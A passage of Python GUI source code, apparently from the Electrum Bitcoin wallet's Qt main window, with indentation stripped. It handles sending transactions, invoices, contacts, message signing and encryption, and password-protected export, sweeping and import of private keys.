if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast_transaction(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.get_transaction(txid)
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
